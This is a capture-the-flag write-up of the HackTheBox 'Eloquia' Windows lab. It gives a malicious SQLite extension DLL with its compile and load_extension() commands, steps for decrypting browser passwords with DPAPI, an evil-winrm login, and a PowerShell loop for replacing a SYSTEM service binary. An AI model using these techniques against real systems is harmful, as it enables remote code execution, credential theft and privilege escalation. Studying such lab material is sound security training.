Overview
Platform: HackTheBox Difficulty: Insane IP: 10.129.x.x
Eloquia is a Windows machine featuring two web applications: Eloquia (a blog platform) and Qooqle (a search engine). The attack chain involves SQLite exploitation, browser credential theft, and service binary hijacking.
Scope
Host IP Address Operating System Role
─────────────────────────────────────────────────────────────────────
ELOQUIA 10.129.x.x Windows Server 2019 Web Server
Executive Summary
The engagement identified critical vulnerabilities:
- SQLite load_extension() enabled allowing arbitrary DLL loading and RCE
- Browser saved passwords accessible via DPAPI decryption from RCE context
- Insecure file permissions on service binary allowing replacement
- Service runs as SYSTEM enabling privilege escalation via binary hijacking
Risk Rating: Critical
Attack Path Overview
┌─────────────────────────────────────────────────────────────────┐
│ SQL Explorer → SQLite load_extension() → RCE as WEB │
└─────────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Edge Browser Profile → DPAPI Decrypt → Olivia.KAT Creds │
└─────────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ WinRM Access → Service Analysis → Binary Write Permissions │
└─────────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Replace Failure2Ban.exe → Service Restart → SYSTEM Shell │
└─────────────────────────────────────────────────────────────────┘
Phase 1: Enumeration
1.1 Port Scanning
nmap -sC -sV -p- 10.129.x.x
Port Service Version
────────────────────────────────────────────────────────
80 HTTP Microsoft IIS
5985 WinRM Microsoft HTTPAPI httpd 2.0
47001 WinRM Microsoft HTTPAPI httpd 2.0
Virtual Hosts Discovered:
eloquia.htb- Blog platform with Django adminqooqle.htb- Search engine with OAuth2
1.2 Web Application Analysis
The Eloquia application exposes a development SQL Explorer at /dev/sql-explorer/play/ that allows executing arbitrary SQL queries against a SQLite database.
Key Finding: SQLite’s load_extension() function is enabled.
Phase 2: Initial Foothold - SQLite RCE
2.1 Attack Vector
SQLite’s load_extension() function can load arbitrary DLLs. The DLL must export a function named sqlite3_<name>_init.
2.2 Malicious DLL Creation
#include <windows.h>
#include <stdlib.h>
__declspec(dllexport) int sqlite3_pwn_init(void *db, char **error, void *api) {
system("whoami > C:\\Web\\Eloquia\\static\\assets\\images\\blog\\output.txt 2>&1");
return 0;
}
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID p) { return TRUE; }
Compile with MinGW:
x86_64-w64-mingw32-gcc -shared -o pwn.dll payload.c
2.3 Exploitation Chain
- Upload DLL via article banner feature (file upload)
- Execute
SELECT load_extension('path/to/dll', 'sqlite3_pwn_init') - Retrieve command output from web-accessible path
Result: RCE as eloquia\web user
Phase 3: Lateral Movement - Browser Credential Theft
3.1 Discovery
The WEB user has a Microsoft Edge browser profile with saved passwords. Since we execute code as WEB, we can decrypt these using DPAPI.
Edge Password Location:
C:\Users\web\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
3.2 DPAPI Decryption
Browser passwords are encrypted with AES-GCM using a key protected by Windows DPAPI. Running as the same user allows decryption:
- Extract encryption key from
Local Statefile - Decrypt key using
CryptUnprotectData(DPAPI) - Use decrypted key to decrypt saved passwords
Credentials Recovered:
URL: http://eloquia.htb/accounts/login/
Username: Olivia.KAT
Password: [REDACTED]
3.3 WinRM Access
evil-winrm -i eloquia.htb -u Olivia.kat -p '[PASSWORD]'
User Flag Retrieved!
Phase 4: Privilege Escalation - Service Binary Hijacking
4.1 Service Discovery
The machine runs a custom Failure2Ban service that monitors failed login attempts and blocks IPs via Windows Firewall.
Service Path:
C:\Program Files\Qooqle IPS Software\Failure2Ban - Prototype\Failure2Ban\bin\Debug\Failure2Ban.exe
4.2 Vulnerability
Olivia.KAT has WRITE permission on the service executable:
icacls "...\Failure2Ban.exe"
# ELOQUIA\Olivia.KAT:(I)(RX,W)
The service runs as LocalSystem (SYSTEM).
4.3 Exploitation
A scheduled cleanup task periodically restarts the Failure2Ban service. During the brief window when the service stops:
- Replace
Failure2Ban.exewith malicious payload - Service restarts, executing payload as SYSTEM
# Loop to catch the unlock moment
$src = "C:\path\to\payload.exe"
$dst = "C:\...\Failure2Ban.exe"
for ($i=0; $i -lt 600; $i++) {
try {
Copy-Item -Path $src -Destination $dst -Force -ErrorAction Stop
Write-Host "SUCCESS!"
break
} catch {
Start-Sleep -Milliseconds 50
}
}
4.4 SYSTEM Shell
C:\Windows\system32>whoami
nt authority\system
Root Flag Retrieved!
Credentials Summary
Phase 1-2 - Initial Access
────────────────────────────────────────────────────────────────
admin : [Web App Admin] → SQL Explorer access
WEB : [RCE User] → SQLite load_extension
Phase 3 - Lateral Movement
────────────────────────────────────────────────────────────────
Olivia.KAT : [DPAPI Decrypted] → WinRM access
Phase 4 - Privilege Escalation
────────────────────────────────────────────────────────────────
SYSTEM : [Binary Hijack] → Full compromise
Tools Used
- Nmap - Port scanning and service enumeration
- MinGW (x86_64-w64-mingw32-gcc) - Cross-compiling Windows DLLs
- Python - Automated exploitation scripts
- Evil-WinRM - Remote shell access
- Netcat - Reverse shell listener
Key Vulnerabilities
| Vulnerability | Impact | Severity |
|---|---|---|
| SQLite load_extension() enabled | RCE as WEB user | Critical |
| Browser saved passwords accessible | Lateral movement | High |
| Insecure service binary permissions | Privilege escalation to SYSTEM | Critical |